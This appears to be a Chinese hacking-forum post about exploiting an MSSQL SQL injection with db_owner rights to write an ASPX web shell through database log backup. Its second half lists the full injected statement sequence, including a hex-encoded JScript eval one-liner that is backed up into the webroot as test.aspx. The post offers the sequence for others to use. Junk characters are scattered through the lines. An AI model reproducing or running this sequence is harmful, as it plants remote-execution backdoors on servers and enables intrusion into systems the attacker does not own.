最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
) M6 L' f- {+ b, y但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
0 ]0 Q f+ C4 ^经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。' {; ]. `; D+ U' N
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。
# V0 ~- `, F" ^# u, N( J! e) V6 \' d
--------------------------------------------------------------
* {2 a; ~, a# G) z今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,6 i, I4 e* z% ~1 |+ Y: A8 `
自己修改备份语句如下:- [# V5 Z9 d* x7 O% @( O/ v/ {
Drop table cmd;--
2 `+ r) P A& Zalter database db_test set RECOVERY FULL;--8 t5 v# q" v! R+ a& ~# r7 C
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
8 `5 K9 ? x W+ c; tbackup log db_test to disk = 'c:\bak' with init;--
9 \! a: P7 i: U* P0 vinsert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--! Q. d" G7 Q1 u4 P, E; `3 A: y
delete from cmd where id>1;--删除id>1的数据
7 j* v- q% y9 q) Fbackup log db_test to disk = 'e:\webroot\test.aspx';--
; X5 d0 B. I" c! t" m' M; E9 O( qDrop table cmd;--
, W* p, w* z( \- y* z0 G+ Q! A9 A希望对大家有用。 |